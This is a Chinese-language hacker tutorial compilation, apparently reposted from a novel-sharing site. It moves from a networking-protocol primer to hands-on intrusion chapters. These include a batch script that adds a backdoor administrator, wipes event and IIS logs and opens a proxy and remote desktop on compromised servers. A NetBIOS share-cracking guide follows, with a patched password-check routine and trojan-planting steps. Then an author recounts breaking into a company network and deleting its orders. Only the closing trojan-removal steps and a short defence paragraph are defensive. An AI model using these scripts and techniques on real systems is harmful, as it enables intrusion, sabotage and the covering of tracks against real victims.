  现今网络界已经开发出了许多协议,但是只有极其少数被保留了下来(那些就是精英中的精英)。那些协议被淘汰有多种原因:设计不好、实现不好或缺乏多样的支持。而那些被保留下来的协议,因经历了时间.技术.性能的考验,然而成为了今世今日有效的通信联系方法。当今局域网中最常见的三个协议是Micrsoft的NetBEUI,NOVELL的IPX/SPX,和交叉平台TCP/IP协议(这个TCP/IP协议相信很多学习者都听的最多的)。
  1.TCP/IP协议
  每种网络协议都有自己的优点和缺点,但是只有TCP/IP协议才允许与Internet完全的连接。TCP/IP协议是在60年代由麻省理工学院和一些商业组织机构为美国国防部开发的,即使遭到核武器的攻击而破坏了大部分网络,但是TCP/IP协议仍然能够维持有效的通信联系。ARPANet就是基于协议开发的,并发展成为作为科学家和工程师和更多人们需要交流媒体的Internet。
  Internet大众化以后,人们开始发现全球网络的强大功能和重要性。Internet的普遍性是TCP/IP协议至今仍然使用的原因。常常在没有意识到的情况下,用户就在自己的PC上的系统平台安装了TCP/IP协议,从而使该网络协议在全球应用更广。
  (1)TCP/IP协议整体构架
  传统的OSI(开放式系统互连)参考模型,是一种通信协议,7层抽象的参考模型
  其中每一层执行某一个特定任务。该模型的目的是使各种硬件在相同的层次上相互通信联系。
  OSI分为七层,其名字和功能分别如下:
  ◢物理层(PhysicalLayer):主要功能为定义了网络的物理结构,传输的电磁标准,Bit流的编码及网络的时间原则,如分时复用及分频复用。决定了网络连接类型(端到端或多端连接)及物理拓扑结构。说的俗一些,这一层主要就是负责实际的信号传输。
  ◢数据链路层(DataLinkeview):在两个主机上建立数据链路连接,向物理层传输数据信号,并对信号进行处理使之无差错并合理的传输
  ◢网络层(NetworkLayer):主要负责路由,选择合适的路径,进行阻塞控制等等......功能。
  ◢传输层(TransferLayer):最关键的一层,向用户提供可靠的端到端(End-to-End)服务,它屏蔽了下层的数据通信细节,让用户及应用程序不需要考虑实际的通信方法。
  ◢会话层(SessionLayer):主要负责两个会话进程之间的通信,即两个会话层实体之间的信息交换,管理数据的交换。
  ◢表示层(PresentationLayer):处理通信信号的表示方法,进行不同的格式之间的翻译,并负责数据的加密解密,数据的压缩与恢复
  ◢应用层(ApplicationLayer):保持应用程序之间建立连接所需要的数据记录,为用户服务。
  而TCP/IP协议并不完全符合OSI的七层抽象的参考模型,它采用了只有4层结构,每一层都呼叫它的下一层所提供的网络来完成自己的需求。
  这4层分别是:
  ◆应用层:应用程序间沟通的一层,如简单电子邮件传输协议(SMTP).文件传输协议{(FTP)这个如果让我们得到最高FTP权限,就可以直接改对方的主页面了,很重要的入侵途径}.网络远程访问协议{(Telnet)如果登陆上它,那么你可以当自己的CMD一样用命令控制使用那台机子了,哈哈}等等......;
  ◆传输层:此层提供了节点间的数据传送服务,如传输控制协议(TCP).用户数据报协议{(UDP)我们经常用的OICQ就是用这个UDP协议拉,所以大家要记住啊,不然别人问起你的QQ是用什么协议进行通信的,你居然不知道,还说玩了多久QQ或者有个多少位好号码的QQ呢}等等......,TCP和UDP给数据包加入传输数据并把它传输到下一层中,这一层负责传送数据,并且确定数据已被送到达并接收;
  ◆网络层:负责提供基本的数据封包传送功能,让每一块数据包都能到达目的主机(但不会检查确认是否被正确的接收),如网际协议(IP)......;
  ◆网络接口层:对实际的网络媒体管理,定义如何使用实际网络(如Ethernet、SerialLine等......)来传送数据。
  (2)TCP/IP协议中的功能
  ◆IP协议
  网际协议IP是TCP/IP的心脏.核心,也是网络层中最为重要的协议。
  IP层接收由更低层(网络接口层,例如LAN(以太网)设备驱动程序)发来的数据包,并把该数据包发送到更高层--TCP或UDP层;相反,IP层也把从TCP或UDP层接收来的数据包传送到更低层。IP数据包是不可靠的,因为IP并没有做任何事情来确认数据包是按顺序发送的或者没有被破坏过的。IP数据包中含有发送它的主机的地址(源地址)和接收它的主机的地址(目的地址)。
  高层的TCP和UDP服务在接收数据包时,通常假设包中的源地址是有效的。也可以这样说,IP地址形成了许多服务的认证基础,这些服务相信数据包是从一个有效的主机发送来的。IP确认包含一个选项,叫作IPSourceRouting,可以用来指定一条源地址和目的地址之间的直接路径。对于一些TCP和UDP的服务来说,使用了该选项的IP包好象是从路径上的最后一个系统传递过来的,而不是来自于它的真实地点。这个选项是为了测试而存在的,说明了它可以被用来欺骗系统,然后可以进行平常是被禁止的连接。那么,许多依靠IP源地址做确认的服务将产生问题并且会被利用到非法的入侵。
  ◆TCP协议
  如果IP数据包中有已经封好了的TCP数据包,那么IP将把它们传送到TCP层。TCP将包排序并进行错误检查,同时实现虚电路间的连接。TCP数据包中包括序号和确认,所以未按照顺序收到的包可以被排序,而损坏的包可以被重新传输。TCP将它的信息送到更高层的应用程序中,例如Telnet的服务程序和客户程序。应用程序轮流将信息送回TCP层,TCP层便将它们向下传送到IP层.设备驱动程序和物理介质.最后到接收方。
  面向连接的服务(例如Telnet、FTP、Rlogin、Xwindows和SMTP)需要高度的可靠性,所以它们使用了TCP.DNS(全称是DomainNameSystem为了方便为我们在文字和IP之间担当了翻译而免除了强记号码的痛苦,当您连上一个网址在URL打上http://www.chinasafe.net这样不就更容易记住吗,要打一连4组的IP数字会记晕啊)在某些情况下使用TCP(发送和接收域名数据库),但使用UDP传送有关单个主机的信息。
  ◆UDP协议
  UDP与TCP位于同一层,但不提供任何顺序或重新排序功能,因此,UDP不被应用于那些使用虚电路的面向连接服务,UDP主要用于那些面向查询——应答的服务,例如NFS。欺骗UDP包比欺骗TCP包更容易更简单,因为UDP没有建立初始化连接(也就是称为握手,因为在两个系统间没有虚电路),也就是说,与UDP相关的服务面临着更大的危险。所以QQ就是这样经常有偷QQ.破QQ.QQ补丁这些软件程式的出现。
  协议优点缺点
  TCP传送稳定资料传送成功率高。速度比较慢。
  UDP传输量大迅速。不稳定容易遗失资料
  ◆ICMP(InternetControlMessageProtocol)协议
  ICMP与IP位于同一层,它被用来传送IP的的控制信息。它主要是用来提供有关通向目的地址的路径信息。ICMP的“Redirect”信息通知主机通向其他系统的更准确路径,而“Unreachable”信息则指出路径有问题。另外,如果路径不可用了,ICMP可以使TCP连接“体面的”终止。Ping(可以P出对方域名的IP)是最常用的基于ICMP服务。tracert和traceroute也是属於ICMP的。不知道什么时候有人告诉我,ICMP用来制作攻击程式了,哈哈,想不到一种这么好的协议都用来做攻击软件的使用,IGMP就在很早都给菜鸟们用来丢数据包从而使得对方机子因网络数据堵塞,机子处理不过来,死机或者掉线,这个可是98的一个安全隐患啊,2K或者有宽带的都很难炸的到掉线了。世界真是瞬间万变啊^ō^
  2.NetBEUI协议
  NetBEUI是为IBM开发的非路由协议,用于携带NetBIOS(共享啊,看到这个协议就高兴啊,哈哈,比较简单的入侵是靠它进行的)通信。NetBEUI缺乏路由和网络层寻址功能,既是其最大的优点,也是其最大的缺点。因为它不需要附加的网络地址和网络层头尾,所以很快并很有效且适用于只有单个网络或整个环境桥接起来的小工作组环境。因为不支持路由,所以NetBEUI永远不会成为企业网络的主要协议。NetBEUI帧中唯一的地址是数据链路层媒体访问控制(MAC)地址,该地址标识了网卡但没有标识网络。路由器靠网络地址将帧转发到最终目的地,而NetBEUI帧完全缺乏该信息。网桥负责按照数据链路层地址在网络之间转发通信,但是有很多缺点。因为所有的广播通信都必须转发到每个网络中,所以网桥的扩展性不好。NetBEUI特别包括了广播通信的记数并依赖它解决命名冲突。一般而言,桥接NetBEUI网络很少超过100台主机。
  近年来以依赖于第二层交换器的网络变得更为普遍了。完全转换环境,降低了网络的利用率,尽管广播仍然转发到网络中的每台主机。事实上,联合使用100-BASE-TEthernet
  允许转换NetBIOS网络扩展到350台主机,才能避免广播通信成为严重的问题。
  3.IPX/SPX
  IPX是NOVELL用于NetWare客户端/服务器的协议群组,避免了NetBEUI的脆弱点。但是,也带来了新的弱点。IPX具有完全的路由能力,可用于大型企业网。它包括32位网络地址,在单个环境中允许有许多路由网络,啊.挺强吧!!!IPX的可扩展性受到其高层广播通信和高开销的限制。服务广告协议(ServiceAdvertisingProtocol,SAP)将路由网络中的主机数限制为几千。尽管SAP的局限性已经被智能路由器和服务器配置所克服,但是,大规模IPX网络的管理员仍是非常困难的工作中啊。
  从用户的角度LOOK,TCP/IP协议提供一些应用程序,主要包括:
  1.远程登录协议(Telnet)
  2.文件传输协议(Ftp)
  3.电子邮件服务(Email)
  4.Internet漫游服务(WWW服务)
  5.简单邮件传输协议(SMTP)
  6.信息服务(Gopher)
  7.文件检索服务(Archie)
  ●远程登录协议(Telnet):用Telnet可以登录到远程服务器上并进行信息访问,可访问所有的数据库、联机游戏、对话服务以及电子公告牌,相当与被访问的计算机是自己的电脑,不过是要用全命令式的来操作。
  ●文件传输协议(Ftp):运用FTP可以从网上得到许多应用程序和信息。最初的FTP程序是工作在UNIX系统下的,以前的许多FTP程序是工作在Window95下的,现在就~~~~~~~~,哈哈,不用我多说把,FTP程序除了完成文件的传送之外,还允许用户建立与远程计算机的连接,登录到远程主机上,并可在远程主机上的目录间移动。(随意改动对方的文件哦,主要是对方的主页啊!!!)
  ●电子邮件服务(Email):电子邮件是Internet提供的使用最广泛的服务。通过电子邮件,可以与Internet上的任何人交换信息。电子邮件的快速、高效、方便以及价廉,使得越来越多的人热衷于这项服务。目前,全球平均每天约有上亿电子邮件在网上传输。不过最近这1.2年国内的电子邮件服务的站点因为要使用到庞大的资金,另站点耗费太大,所有都陆陆续续的开始进行Email收费了,不过还是有很多免费的,例如163.21CN,我都在用啊,哈哈
  ●Internet漫游服务(WWW服务):现在大家使用的最多应该是WWW服务,它同其它Internet程序的最大区别就是它的界面对我们有很大的吸引力,通过WWW服务,只要用鼠标单击一下,就可以到达世界上任何一个有网络,可以登陆Internet的地方。由于WWW服务使用的是超文本链接,所以可以很方便的从一个信息页转换到另一个信息页。它不仅能查看文字,还可以欣赏图片、音乐(MP3啊,已经流行很久了)、动画(最近这1年FLASH发展的更快更广了,差不多每个站点都有用FLASH制作的Bananer和LOGO。比较流行WWW服务的程序就是Tbrowser(QQ浏览器)和IE(WIN自带的浏览器啊)了。
  ●简单邮件传输协议(SMTP):SMTP是TCP/IP协议一族的一名成员,这种协议认为你的主机是永远连接在Internet上的,而且,认为你在网络上的主机是可以在任何时候都被访问的。所以,它适用于永远连接在Internet的主机(当然停电或者什么意外,那就要关机啊),但是无法使用通过SLIP/PPP连接的用户接收电子邮件。解决这个问题的办法是在邮件主机上同时运行SMTP和POP协议的程序,SMTP负责邮件的发送和在邮件主机上的分拣和存储,POP协议负责将邮件通过SLIP/PPP连接传送到用户的主机上。
  ●信息服务(Gopher):Gopher最早出现在1991年,它其实是第一个操作简便.使用广泛的从Internet服务器上获取信息的客户应用程序。除了操作简单外,它的另一个特点是速度快。Gopher运行时,将显示一个交互式的供用户选择的菜单,菜单中的选项由简单的短句组成,每个短句通常指向另一个菜单,并最终指向有用的文件。Gopher是帮助用户在Internet信息海洋中搜索有用信息的导航器。用户只要关心浏览的内容,而不必关心具体的服务器,所以没多少人知道或者了解这个服务,没去看协议的人一般都不会发现有这样的服务的存在。
  ●文件检索服务(Archie):它是一种从整个Internet上匿名FTP服务器获取文件的服务。其完全依赖于匿名FTP系统的管理员,他们将站点对全世界的Archie服务器进行了注册。Archie仅通过文件名进行检索。这个服务也比较少见,都是默默的为Internet工作,最常见到的就是:远程登录协议(Telnet).文件传输协议(Ftp).电子邮件服务(Email).Internet漫游服务(WWW服务).简单邮件传输协议(SMTP)这些协议一定要记住啊,不然怎么学安全或者Hacker!!!
  SNMP(SimpleNetworkManagementProtocol):简单网络管理协议
  是一广泛使用的网管协议
  帮助网管人员管理TCP/IP网络中各种装置
  没有繁复的指令
  概念上只有fetch-store(存-取)两种命令
  其优点为简单
  稳定及灵活.
  IP地址的表示形式:
  Internet和我们直接发生关系的既不是物理网,也不是网络协议,而是网络应用软件和应用程序。它们是我们使用网络时必须借助的基本工具,是我们与网络打交道.交互界面和入口。这些网络应用程序与在单个计算机上运行的单用户应用程序不同,它离开网络使用将没有意义。网络应用程序很多,如:Mail、telnet、ftp、archie、gopher、WAIS和WWW浏览器等。要上网,就必须了解Internet的地址和域名等基本常识。Internet的地址就像我们身边的街道号码.地址住所,用来标示网上计算机的“住址”。Internet实际上是一个大型的TCP/IP网络,在Internet上进行信息交换的基本要求就是网上的所有主机必须具有唯一的地址,就象日常生活中朋友之间相互通信需要写明通信地址一样。Internet地址分为两种形式:用数字表示的IP地址和用字母表示的域名地址。在Internet上为每台主机指定的地址称为IP地址。其是唯一的,具有固定.规范的格式。每个IP地址含32位,被分为4段,每段8位,段与段之间用句点分隔。为了便于表达和识别,IP地址是以十进制形式表示的,每段所能表示的十进制数最大不超过255。IP地址由两部分组成,即网络号(NetgworkID)和主机号(HostID)。网络号标识的是Internet上的一个子网,而主机号标识的是子网中的某台主机。网际地址分解成两个域后,带来了一个重要的优点:IP数据包从网际上的一个网络到达另一个网络时,选择路径可以基于网络而不是主机。在大型的网际中,这一优势特别明显,因为路由表中只存储网络信息而不是主机信息,这样可以大大简化路由表。IP地址根据网络号和主机号的数量而分为A、B、C三类:
  A类IP地址:用7位来标识网络号,24位标识主机号,最前面一位为“0”,即A类地址的第一段取值介于1~126之间。A类地址通常为大型网络而提供,全世界总共只有126个只可能的A类网络,每个A类网络最多可以连接16777214台主机。
  B类IP地址:用14位来标识网络号,16位标识主机号,前面两位是“10”。B类地址的第一段取值介于128~191之间,第一段和第二段合在一起表示网络号。B类地址适用于中等规模的网络,全世界大约有16000个B类网络,每个B类网络最多可以连接65534台主机。
  C类IP地址:用21位来标识网络号,8位标识主机号,前面三位是“110”。C类地址的第一段取值介于192~223之间,第一段、第二段、第三段合在一起表示网络号。最后一段标识网络上的主机号。C类地址适用于校园网等小型网络,每个C类网络最多可以有254台主机。
  所有的IP地址都由国际组织NIC(NetworkInformationCenter)负责统一分配,目前全世界共有三个这样的网络信息中心:
  InterNIC:负责美国及其他地区;
  ENIC:负责欧洲地区;
  APNIC:负责亚太地区;
  类型
  IP地址
  网络ID
  宿主机ID
  A
  w.x.y.z
  w
  x.y
  B
  w.x.y.z
  w.x
  x.z
  C
  w.x.y.z
  w.x.y
  z
  A类:高端位0,接下来7位表示网络ID,其余24位表示宿主机ID
  B类:高端位10,接下来14位表示网络ID,其余16位表示宿主机ID
  C类:高端位110,接下来的21位表示网络ID,其余8位表示宿主机ID
  D类:高端位1110,在网络IP地址设置中不用
  E类:高端位1111,实验地址在网络IP地址设置中不用
  A类地址适合于网络较少而节点较多的情况,网络数为128,每一网络的节点数为1千6百万个。
  B类地址适合于网络数和节点数适中的情况,网络数为16000个,每一网络的节点数为64000个。
  C类地址适合于网络数较多而节点较少的情况,网络数为2百万个,每个网络的节点数为256个。
  如何识别IP地址类别:根据IP地址的第一字节值业判数,
  1-126(1.x.y.z-126.x.y.z)A类
  128-191(128.x.y.z-191.x.y.z)B类
  192-223(192.x.y.z-223.x.y.z)C类
  网络地址分配准则
  网络ID必须是唯一
  127保留给诊数回送函数
  网络ID的位不都置为1(十进制255)255用作广播地址
  网络ID位不能都置为0,0表示局部网络
  一些常出现在大家眼中的网络设备:
  ●网卡:网卡是计算机与网络相连的接口电路。它的主要功能是:并行数据与串行数据的转化:网络信号的产生:数据包的装配和拆卸;数据的缓存及数据存取控制等
  ●集线器(HUB)
  它的作用主要是将信号再生转发,使用集线器可以改善网络的管理和维护,提高网络的稳定性和可靠性。集线器一般分为独立式.交换式.智能式.堆叠式和SwitchHUB等几种。接口数是集线器的一个重要参数。它是指集线器所能连接的计算机数目。
  ●中继器(Repeater)
  主要作用是放大在传输介质上的传输信号,以便在网络上传输的更远。
  ●网桥(Brige)
  它主要用于连接使用相同通信协议.传输介质和寻址方式的网络。网桥可以连接不同类型的局域网,也可以将一个大网分成多个子网,均衡各网段的负荷,提高网络的性能。
  ●路由器(Router)
  其作用主要是连接局域网和广域网,它有判断网络地址和选者路径的功能。它的主要工作是为经过路由器的报文寻找一条最佳路径,并将数据传到目的站点。
  ●网关(Gateway)
  它用于不同的网络之间的连接,为网络提供协议转换,并将数据重新分组后传送。
  在这章中让大家简略了解WIN系统.BUG.的一些知识,重点是协议。相信在以后的章程中可以让大家更好的学习。
  未经同意而又不是中国安全网的核心或者斑竹请勿转载,否者后果自负
  收集编辑:Eternal(陈小风)中国安全网:http://www.chinasafe.net/
滺優書擝 uUTxt。com 铨纹子版越牍


第三卷 第四章 字数:1466
  ?最有效的安装3389终端,SOCKS5代理!删除日志。这里讲的是一步到位的方法!
  首先需要几个软件
  第一个是snake写的socks5代理跳板,自己去找
  第二个是小榕写的CleanIISLog,
  开始操作:打开--开始--程序--附件--笔记本
  写入:
  -------------------------------------------------------------------------------
  echooff
  netuserTsInternetUser12345
  netlocalgroupadministratorsTsInternetUser/add
  netuse\\127.0.0.1\ipc$"12345"/user:"TsInternetUser"
  dellog.exe-s\\127.0.0.1-l"application"-C
  dellog.exe-s\\127.0.0.1-l"system"-C
  dellog.exe-s\\127.0.0.1-l"security"-C
  netstopw3svc
  delc:\winnt\system32\logfiles\*.*/s/f/q
  deld:\winnt\system32\logfiles\*.*/s/f/q
  netSTARTw3svc
  sss-install
  sss-configstarttype2
  sss-configport1080
  netstartskserver
  echo[Components]>%systemroot%\sql
  echoTSEnable=on>>%systemroot%\sql
  sysocmgr/i:%systemroot%\inf\sysoc.inf/u:%systemroot%\sql/q
  --------------------------------------------------------------------------------
  写好后另存为,3389.bat文件,大家可以更换你想要的名字,但扩展名一定要是bat文件
  然后将文件上传到主机上运行3389.bat,必需同一个目录下运行bat文件,3分钟后你就可以连接3389了!还有SOCKS5代理
  但不是每台主机都行!要确定是台win2000server肉鸡!这样的成功率高达80%,本人测试10台server肉鸡后有7台能登陆3389,好东西当然要分享啦!
優優书擝 uuTXT.coM 全纹吇坂月读


第三卷 第五章 字数:7410
  ?网络上的攻击方法层出不穷,但对于那些想当黑客的初学者而言,利用netbios入侵是首选的入侵方式。可以说网上有关netbios的文章多如牛毛!可是针对初学者的实用性强的文章却不太多,比如大多数此类文章对网络设置都没好好讲过
  使许多初学者至今都没成功入侵过。
  入侵前的准备:一台用modem上网的家庭电脑(保证自己有充分的支配权进行研究),操作系统最好是使用win98
  再加一个可以显示IP的QQ
  还要有一个搜索网络共享肉鸡的好软件,在这里推荐大家使用国产黑客软件“网络刺客II”。
  共享入侵的流程:
  1.检查一遍自己的网络设置是否符合入侵要求
  有相当多的初学者不能成功入侵共享机器就是因为没有正确设置网络环境:因为win98默认安装时并没有安装“文件与共享服务”,所以不能进行共享访问。请先检查爱机有没有网络邻居,如果没有就依次进入“控制面板”→“网络”,选中“Microsoft网络用户”为主网络登录方式,然后点击“文件及打印共享”这一按键,再选中“允许其它用户访问我的文件”,最后按确定后按提示放入win98安装光盘进行补装。重启后你会发现你的桌面上多了个网络邻居,。接下来我们再依次点击“我的电脑”→“拨号网络”的“服务器类型”标签
  选中“登录网络”这一项并选上“NetBEUI"协议(因为“登录网络”很影响拨号速度,大部分人都早把它取消了,这也是最易被忽略的共享设置)。经过这样的设置,我们就可以远程访问共享计算机了。注:设置共享不需要网卡。
  2.搜索Internet上的共享机器
  再一次吐血推荐著名的国产黑客软件“网络刺客II”,推荐它的原因是它有着非常强大的搜索互联网上的共享主机的功能,并且容易上手(请支持国产软件!)。我们首先要有一些有效的IP地址作为搜索条件,现在我们就打开先前已下载好的完美版QQ吧
  在你的QQ好友里随便选个IP地址,然后打开“主机资源”→“搜索共享主机”,输入IP的搜索范围,比如你获得的IP为888.888.888.888(乱写的),你只要在起始地址里输入888.888.888.1,终止地址会自动填上888.888.888.255,最后按开始搜索,等上几分钟就会有一大把肉鸡的列表显示出来了。(如果没有的话就换个IP搜索)
  3.入侵方式
  入侵方法有好几种,这里我推荐两种最简单的入侵方式:一种是直接在“开始”→“运行”里输入\\IP(这个IP就是肉鸡的IP
  注意“\\”不能少!)并回车,然后再过几十秒左右就会出现那台主机所有的共享目录,这时你就可以进行访问了,如果你顺利访问C盘
  就再试试能不能在里面创建一个文件,如果能的话,恭喜你!这是一台完全共享C盘的主机,对于这样的主机,我们可以用木马来完全获得它的控制权,其具体操作分两种情况,这方面在以下一节中详细讲解。还有一种方式是利用“网络刺客II”进入共享主机,方法也很简单,在列出的共享主机列表中选中一台主机的共享目录,右击出现一菜单,点中“映射成网络硬盘”,过一会软件就会提示映射成功,接下来就快进入“我的电脑”看看战果吧。随着入侵次数的增多,你可能会常遇到设有共享密码的目录,这种情况你就必须输对共享密码才能访问到共享目录。关于共享密码的破解方法,还是非常有必要了解的。由于本人水平有限,在这个方面只能提供两种方法,一种是通过软件进行暴力破解,这样的软件有很多
  ,“网络刺客II”本身就含有强大的破解功能
  其具体操作就不讲了。还有一种破解方式是通过共享目录密码的效验bug进行闪电破解。你只要对vredir.vxd修改(它存在漏洞,)
  下面是文件VSERVER(以下代码分析是转贴的那位bug发现者的所写的资料):
  VXD中密码校验过程调用的有BUG的一段程序。
  3647是判断客户端密码是不是输入没密码,这时密码项内容是0X20,空格。
  不是就转LOC-0444。
  365A判断客户端通过网络通信发过来的加密后密码长度是0X18吗,一般都是。这转LOC-0447去把共享目录密码加密同网络通信过来的密码比较,通过TESTEAX,EAX设置ZF标记判断密码对不对。如果密码长度不是0X18,可能是别的什么方式的密码比较,这儿密码是明码没加密。再判断密码长度大于9不,共享密码长度是1-8个字母数字等。下面就是比较密码,后面的循环是以ECX密码长度和ZF标记为结束条件。显然这儿应该有BUG,这密码长度ECX应该是本声密码的长度,而这儿密码长度是网络通信发过来的数据。所以我发过来的数据是1就只比较了一个密码的最前面字节。如果这一字节对就ZF=0因ECX=0退出结果是校验密码成功。
  03647----loc_0442:----;xref03635
  0364766|833A20cmp--wordptr[edx]
  20h;THESHAREPASSWORD
  0364B750Djne--shortloc_0444--;Jumpifnotequal
  0364DB808460002----mov--eax
  8460002h
  03652F9------stc----;Setcarryflag
  03653C9----leave----;Procedureexit
  03654C3------retn
  03655------loc_0443:----;xref03640
  3645
  03655803F00----cmp--byteptr[edi]
  0
  036587426----je--shortloc_0446;Jumpifequal
  0365A----loc_0444:------;xref0364B
  0365A83F918cmpecx
  18h;THISHASBUGFOUNDBYYRG1999.1.15
  0365D7424je--shortloc_0447--;Jumpifequal
  0365F83F909--cmp--ecx
  9
  03662771C--ja--shortloc_0446--;Jumpifabove
  03664F5----cmc----;Complementcarry
  0366583D900--sbb--ecx
  0
  0366851----push--ecx
  0366953----push--ebx
  0366A8B1D000137F4--mov--ebx
  dwordptrdata_0461--;(137F4=137FCh)
  036708BF2----mov--esi
  edx
  036722BC0----sub--eax
  eax
  036744F------dec--edi
  03675------locloop_0445:----------;xref0367C
  0367547------inc--edi
  03676AC------lodsb--;String[si]toal
  036778A0418----mov--al
  [eax][ebx]
  0367A3A07--cmp--al
  [edi];BUG!!!ICANSETECX=1
  0367CE1F7loopdz--locloop_0445;Loopifzf=1
  ecx>0
  0367E5B--pop--ebx
  0367F59----pop--ecx
  03680----loc_0446:--;xref03658
  3662
  36A1
  03680鶩8----clc--;Clearcarryflag
  03681C9----leave----;Procedureexit
  03682C3----retn
  03683----loc_0447:;xref0365D
  0368381EC000000E4--sub--esp
  0E4h
  036898BC4----mov--eax
  esp
  0368B60------pushad--;Saveallregs
  0368C?2------push--edx--;PARAMETER_4
  0368D50------push--eax--;PARAMETER_3
  0368E8B4508----mov--eax
  dwordptr[ebp+PARAMETER_1]
  036918B4024----mov--eax
  dwordptr[eax+24h]
  0369450------push--eax--;PARAMETER_2
  0369557------push--edi--;PARAMETER_1
  03696E8000036A1----call--sub_0054----;(06D3C)
  0369B83C410----add--esp
  10h
  0369E85C0----test--eax
  eax
  036A061------popad--;Restoreallregs
  036A1EBDD----jmp--shortloc_0446--
  好了,那就找客户端发密码的代码。下面是VREDIR。VXD的这段相关代码。
  15FCE的18H就是前面的那比较18H的。这儿改成可以1。CALLSUB-0067是加密输入的密码的过程调用。15FEA的EDX是指向输入的密码的指针。所以15FE9可以改成MOVAL,[EDX],
  MOV[ECX],AL
  JMP15FF4
  就可以。这样进入有密码的共享目录就可以用字母A-Z,数字0-9等试会很快的进入目录的。当然最好那儿自动这么变化那AL,免得每次还要输入可以加快速度。
  15FC88B4DEC--mov--ecx
  dwordptr[ebp-14h]
  15FCB8B55F4--mov--edx
  dwordptr[ebp-0Ch]
  15FCE66|C741070018--mov--wordptr[ecx+7]
  18h;PASSWORDLONG
  15FD483C107----add--ecx
  7
  15FD783C235----add--edx
  35h
  15FDA8B45F8----mov--eax
  dwordptr[ebp-8]
  15FDD83C06C----add--eax
  6Ch
  15FE0894DF0----mov--dwordptr[ebp-10h]
  ecx
  15FE38B4DEC----mov--ecx
  dwordptr[ebp-14h]
  15FE683C10B----add--ecx
  0Bh
  15FE951------push--ecx;LOCKEDPASSWORDSETHERE
  15FEA52------push--edx;PASSWORDPOINTER
  15FEB50------push--eax
  15FECE8FFFF0EC5----call--sub_0067;LOCKTHEPASSWORD----;(06EB6)
  15FF183C40C----add--esp
  0Ch
  15FF4EB71----jmp--shortloc_1765--
  然后--
  改好后,复制到windos\system下覆盖掉原文件再重启一下就可以进行破解了。以上两种破解共享密码的方式,本人极力推荐后者,理论上它可以在几分钟内破解开任何难度的密码。但是暴力破解不是一点也没用,在万不得已的时候还是要用暴力破解的方式碰碰运气。至于为什么会仍然要用到远程暴力破解,你再看看下一节就明白了。
  4.共享计算机的利用
  在这我们只讲完全共享C盘的情况,这种情况是很理想的,因为我们可以利用植入木马的方式来获得共享电脑的完全控制权。但问题在于怎么远程运行木马。我们分两种情况:1.对方电脑开启了计划任务程序,我们先在自己的电脑上做好木马(推荐使用最新版“广外女生”木马),然后在自己的计划任务中添加这个运行木马的任务(不要让自己运行),再到自己电脑的c:\windows\Tasks
  把那两个计划任务的文件拷到远程计算机的相应目录,再用pingIPtime命令获知对方电脑的时间,最后根据这个时间重设远程计算机的计划程序使木马的计划任务过几分钟就运行(可别忘了拷给远程计算机一个木马)。2.拷给远程计算机一个木马,在c:\windows\win.ini中配置,在[windows]段中的load=后写上你放置的木马的路径。这样只要对方重启过计算机后我们就可以进行控制了。
  5.共享入侵的防范措施
  最简单的方法就是取消所有共享
  但如果你非要共享的话(尽量设为只读共享),那就要加上一个足够复杂的共享密码(混合的8位以上的密码),然后再下载一个共享目录的密码效验bug补丁。虽然入侵者仍然可以试图通过暴力破解来解密,但是在实际中
  只要你的密码够复杂,对手肯定没戏(这还得归功于共享访问的蜗牛速度)。最后要提提的是不要中了别人的木马,特别是那些小巧的共享木马。所以我们上网还要有一个强大的防火墙。国内的天网就是个不错的选择。
  (以下是我利用此入侵技术的小片断):
  版主的黑客片断
  …………
  在这前几天,我闯了祸:入侵一家深圳计算机公司的内部网,删光了公司的一大堆定单,并在删完后在空空的定单目录留下了一条挺张狂的黑客留言,内容是嘲笑公司的安全性。过了几天,我想起了这家公司,再入侵,发现加了个访问密码,不好入侵了。嘿嘿,就怕他的密码加的不长不复杂(最好有100000000位),用它的编码校验漏洞!仅仅用了两分钟,他的硬盘内容又出现在我的眼前………
  8.27日下午,也就是上次入侵之后,我无意中发现了一台非常重要的计算机!在里面我看到了不少Email,内容是中国技术联播网给予各地区政府的账号,各地区政府部门可用它在中国技术联播和中国星火计划两大国家政府网站上发布当地的政治、经济文化和最新科技产品。并申明这是不可改的唯一账号,请各政府部门注意这一点。真的假的,我自学才一个月竟,我用sina搜索引挚找到了中国技术联播网,好像还是新开不久的网站
  先用天津政府的账号试试,靠,真的进去了!oοО○
  话外音:才自学了几天的黑客,用引挚反复狂搜hacker、黑客字眼,换来这种成果,现在想起来真是很爽.,。再一次申明,这篇文章是我真实的回忆!到现在,这个漏洞我也只总共玩了几天,我并不是什么黑客高手,甚至没有你们学网络安全学的时间长,只是一名稍懂点点毛坯的、对电脑很感兴趣的电脑爱好者。
  哎哟哟,说了这么多了,我头晕眼花,手抖了脚也麻了,我倒@~@
  警告:本文属作者xhacker,所有如果你要转载此文请保证本文的完整性!!!
滺U書盟 UutXt.com 全文字版越镀


第三卷 第六章 字数:1254
  ?注意:以下清除顺序不可以随意调整。
  1.删除灰鸽子服务端程序
  由于在Windows环境下灰鸽子的服务端是处于运行状态,无法直接删除,所以必须进入纯DOS状态删除,删除命令如下:
  cdc:\windows\system
  attrib-r-s-hkernel32.exe
  attrib-r-s-hnotepod.exe
  delkernel32.exe
  delnotepod.exe
  还要注意,如果灰鸽子服务端设置了exe文件关联的话,将会导致注册表编辑器无法运行,所以在删除服务端之前,先将注册表编辑器重命名,以便以后对注册表进行更改,操作命令如下:
  renc:\windows\regedit.exeregedit.com
  2.删除注册表中启动键
  由于我们改了注册表编辑器名称,所以要打开注册表编辑器应为:打开”开始“菜单”中的“运行”然后输入“regedit.com".启动注册表编辑器后,依次打开“HKEY-LOCAL-MACHINE\Software\Microsoft\windows\CurrentVersion\Run",在右边的窗口中删除名称为”Loadwindows"的键值就可以了。
  --------------------------------------------------------------------
  清除文件关联
  灰鸽子可以设置4种文件关联:exe关联,txt关联,ini关联,inf关联,其中exe关联可以和其他三种类型同时存在。
  1.解除exe关联:
  启动注册表编辑器,然后找到HKEY-CLASSES-ROOT\Exefile\shell\Open\Cpmmand主键,查看起默认的键值是不是系统默认的“%1%*”,如果被修改,则改成默认值.
  2.解除txt关联:
  打开注册表的HKEY-CLASSES-ROOT\txtfile\shell\open\command主键,其默认值的正常参数应该为“C:\windows\notepad.exe%1"
  如果不是,请修改为正确数据。
  3.解除ini关联:
  INI文件的的关联配置保存在注册表HKEY-CLASSES-ROOT\Inffile\shell\Open\Cpmmand主键下,其默值数据也是“C:\windows\notepad.exe%1”,如果被修改的话,也要改回来。
  4解除inf关联:
  打开注册表的HKEY-CLASSES-ROOT\Inffile\shell\Open\Cpmmand主键,和ini
